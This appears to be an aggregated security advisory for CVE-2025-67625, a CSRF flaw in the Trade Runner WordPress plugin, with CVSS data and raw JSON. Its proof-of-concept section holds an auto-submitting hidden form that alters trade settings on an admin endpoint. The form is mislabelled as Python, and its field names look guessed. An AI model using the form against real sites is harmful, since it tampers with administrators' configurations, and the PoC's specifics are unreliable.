Security Vulnerability Report
中文
CVE-2025-67625 CVSS 4.3 MEDIUM

CVE-2025-67625

Published: 2025-12-24 13:16:19
Last Modified: 2026-04-27 18:16:47

Description

Cross-Site Request Forgery (CSRF) vulnerability in tmtraderunner Trade Runner traderunner allows Cross Site Request Forgery.This issue affects Trade Runner: from n/a through <= 3.14.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Trade Runner <= 3.14

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CSRF PoC for CVE-2025-67625 --> <!-- Target: WordPress with Trade Runner Plugin <= 3.14 --> <!DOCTYPE html> <html> <head> <title>CSRF Attack PoC - Trade Runner</title> </head> <body> <h1>Trade Runner CSRF Vulnerability PoC</h1> <p>This PoC demonstrates the CSRF vulnerability in Trade Runner plugin.</p> <!-- Example: Malicious trade configuration change --> <form id="csrfForm" action="http://target-site.com/wp-admin/admin-post.php" method="POST" style="display:none;"> <input type="hidden" name="action" value="traderunner_save_config"> <input type="hidden" name="trade_enabled" value="0"> <input type="hidden" name="risk_level" value="high"> <input type="hidden" name="max_trade_amount" value="999999"> <input type="hidden" name="nonce" value=""> </form> <script> // Auto-submit the form document.getElementById('csrfForm').submit(); console.log('CSRF request sent'); </script> <p>If successful, the trade configuration will be modified.</p> <p>Note: In vulnerable versions, nonce validation may be weak or missing.</p> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67625", "sourceIdentifier": "[email protected]", "published": "2025-12-24T13:16:18.703", "lastModified": "2026-04-27T18:16:46.920", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cross-Site Request Forgery (CSRF) vulnerability in tmtraderunner Trade Runner traderunner allows Cross Site Request Forgery.This issue affects Trade Runner: from n/a through <= 3.14."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/traderunner/vulnerability/wordpress-trade-runner-plugin-3-14-cross-site-request-forgery-csrf-vulnerability?_s_id=cve", "source": "[email protected]"}]}}